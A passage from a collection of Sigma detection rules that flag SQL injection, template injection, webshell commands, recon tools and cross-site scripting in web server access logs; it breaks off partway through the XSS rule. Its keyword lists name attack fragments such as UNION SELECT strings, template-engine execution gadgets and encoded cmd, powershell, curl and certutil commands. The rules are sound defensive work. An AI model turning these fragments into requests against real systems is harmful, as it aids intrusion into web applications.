5513deaf-f49a-46c2-a6c8-3f111b5cb453 status: test description: Detects potential SQL injection attempts via GET requests in access logs. 
references: - https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/ - https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/ - https://brightsec.com/blog/sql-injection-payloads/ - https://github.com/payloadbox/sql-injection-payload-list - https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection author: Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank) date: 2020-02-22 modified: 2023-09-04 tags: - attack.initial-access - attack.t1190 logsource: category: webserver detection: selection: cs-method: 'GET' keywords: - '@@version' - '%271%27%3D%271' - '=select ' - '=select(' - '=select%20' - 'concat_ws(' - 'CONCAT(0x' - 'from mysql.innodb_table_stats' - 'from%20mysql.innodb_table_stats' - 'group_concat(' - 'information_schema.tables' - 'json_arrayagg(' - 'or 1=1#' - 'or%201=1#' - 'order by ' - 'order%20by%20' - 'select * ' - 'select database()' - 'select version()' - 'select%20*%20' - 'select%20database()' - 'select%20version()' - 'select%28sleep%2810%29' - 'SELECTCHAR(' - 'table_schema' - 'UNION ALL SELECT' - 'UNION SELECT' - 'UNION%20ALL%20SELECT' - 'UNION%20SELECT' - "'1'='1" filter_main_status: sc-status: 404 condition: selection and keywords and not 1 of filter_main_* falsepositives: - Java scripts and CSS Files - User searches in search boxes of the respective website - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes level: high ================================================ FILE: rules/web/webserver_generic/web_ssti_in_access_logs.yml ================================================ title: Server Side Template Injection Strings id: ada3bc4f-f0fd-42b9-ba91-e105e8af7342 status: test description: Detects SSTI attempts sent via GET requests in access logs references: - 
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection - https://github.com/payloadbox/ssti-payloads author: Nasreddine Bencherchali (Nextron Systems) date: 2022-06-14 tags: - attack.defense-evasion - attack.t1221 logsource: category: webserver detection: select_method: cs-method: 'GET' keywords: - '={{' - '=%7B%7B' - '=${' - '=$%7B' - '=<%=' - '=%3C%25=' - '=@(' - 'freemarker.template.utility.Execute' - .getClass().forName('javax.script.ScriptEngineManager') - 'T(org.apache.commons.io.IOUtils)' filter: sc-status: 404 condition: select_method and keywords and not filter falsepositives: - User searches in search boxes of the respective website - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes level: high ================================================ FILE: rules/web/webserver_generic/web_susp_useragents.yml ================================================ title: Suspicious User-Agents Related To Recon Tools id: 19aa4f58-94ca-45ff-bc34-92e533c0994a status: test description: Detects known suspicious (default) user-agents related to scanning/recon tools references: - https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb - https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst - https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92 author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton date: 2022-07-19 modified: 2023-01-02 tags: - attack.initial-access - attack.t1190 logsource: category: webserver detection: selection: cs-user-agent|contains: # Add more tools as you see fit - 'Wfuzz/' - 'WPScan v' - 'Recon-ng/v' - 'GIS - AppSec Team - Project Vision' condition: selection falsepositives: - Unknown level: medium 
================================================ FILE: rules/web/webserver_generic/web_susp_windows_path_uri.yml ================================================ title: Suspicious Windows Strings In URI id: 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e status: test description: Detects suspicious Windows strings in URI which could indicate possible exfiltration or webshell communication references: - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-06-06 modified: 2023-01-02 tags: - attack.persistence - attack.exfiltration - attack.t1505.003 logsource: category: webserver detection: selection: cs-uri-query|contains: - '=C:/Users' - '=C:/Program%20Files' - '=C:/Windows' - '=C%3A%5CUsers' - '=C%3A%5CProgram%20Files' - '=C%3A%5CWindows' condition: selection falsepositives: - Legitimate application and websites that use windows paths in their URL level: high ================================================ FILE: rules/web/webserver_generic/web_webshell_regeorg.yml ================================================ title: Webshell ReGeorg Detection Via Web Logs id: 2ea44a60-cfda-11ea-87d0-0242ac130003 status: test description: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg. 
references: - https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3 - https://github.com/sensepost/reGeorg author: Cian Heasley date: 2020-08-04 modified: 2023-01-02 tags: - attack.persistence - attack.t1505.003 logsource: category: webserver detection: selection: cs-uri-query|contains: - 'cmd=read' - 'connect&target' - 'cmd=connect' - 'cmd=disconnect' - 'cmd=forward' filter: cs-referer: null cs-user-agent: null cs-method: POST condition: selection and filter falsepositives: - Web applications that use the same URL parameters as ReGeorg level: high ================================================ FILE: rules/web/webserver_generic/web_win_webshells_in_access_logs.yml ================================================ title: Windows Webshell Strings id: 7ff9db12-1b94-4a79-ba68-a2402c5d6729 status: test description: Detects common commands used in Windows webshells references: - https://bad-jubies.github.io/RCE-NOW-WHAT/ - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2017-02-19 modified: 2022-11-18 tags: - attack.persistence - attack.t1505.003 logsource: category: webserver detection: selection_method: cs-method: 'GET' selection_keywords: # The "%20" is URL encoded version of the space # The "%2B" is URL encoded version of the "+" - '=whoami' - '=net%20user' - '=net+user' - '=net%2Buser' - '=cmd%20/c%' - '=cmd+/c+' - '=cmd%2B/c%' - '=cmd%20/r%' - '=cmd+/r+' - '=cmd%2B/r%' - '=cmd%20/k%' - '=cmd+/k+' - '=cmd%2B/k%' - '=powershell%' - '=powershell+' - '=tasklist%' - '=tasklist+' - '=wmic%' - '=wmic+' - '=ssh%' - '=ssh+' - '=python%' - '=python+' - '=python3%' - '=python3+' - '=ipconfig' - '=wget%' - '=wget+' - '=curl%' - '=curl+' - '=certutil' - '=copy%20%5C%5C' - '=dsquery%' - '=dsquery+' - '=nltest%' - '=nltest+' condition: all of selection_* falsepositives: - Web sites like wikis with articles on 
os commands and pages that include the os commands in the URLs - User searches in search boxes of the respective website level: high ================================================ FILE: rules/web/webserver_generic/web_xss_in_access_logs.yml ================================================ title: Cross Site Scripting Strings id: 65354b83-a2ea-4ea6-8414-3ab38be0d409 status: test description: Detects XSS attempts injected via GET requests in access logs references: - https://github.com/payloadbox/xss-payload-list - https://portswigger.net/web-security/cross-site-scripting/contexts author: Saw Win Naung, Nasreddine Bencherchali date: 2021-08-15 modified: 2022-06-14 tags: - attack.initial-access - attack.t1189 logsource: category: webserver detection: select_method: cs-method: 'GET' keywords: - '=